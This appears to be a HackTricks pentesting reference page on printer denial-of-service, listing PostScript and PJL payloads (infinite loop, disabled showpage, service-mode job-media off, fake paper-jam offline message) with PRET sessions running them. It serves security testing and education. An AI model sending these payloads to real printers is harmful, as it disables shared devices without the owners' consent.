4.9 KiB
Support HackTricks and get benefits!
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](7af18b62b3
/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** Page description languages allowing infinite loops or calculations that require a lot of computing time. Even minimalist languages like PCL can be used to upload permanent macros or fonts until the available memory is consumed.
PostScript
Infinite loops
%!
{} loop
Using PRET:
./pret.py -q printer ps
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> hang
Warning: This command causes an infinite loop rendering the
device useless until manual restart. Press CTRL+C to abort.
Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
Redefine showpage
By setting showpage
– which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed they won't print anything.
true 0 startjob
/showpage {} def
Using PRET:
./pret.py -q printer ps
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> disable
Disabling printing functionality
Both attacks code can also be written into Sys/Start, startup.ps or similar files to cause permanent DoS on devices with a writable disk.
PJL
PJL jobmedia
Proprietary PJL commands can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below:
@PJL SET SERVICEMODE=HPBOISEID
@PJL DEFAULT JOBMEDIA=OFF
Using PRET:
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> disable
Printing functionality: OFF
Offline mode
In addition, the PJL standard defines the OPMSG
command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below:
@PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS"
Using PRET:
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> offline "MESSAGE TO DSIPLAY"
Warning: Taking the printer offline will prevent yourself and others
from printing or re-connecting to the device. Press CTRL+C to abort.
Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
Learn more about these attacks in http://hacking-printers.net/wiki/index.php/Document_processing
Support HackTricks and get benefits!
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](7af18b62b3
/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**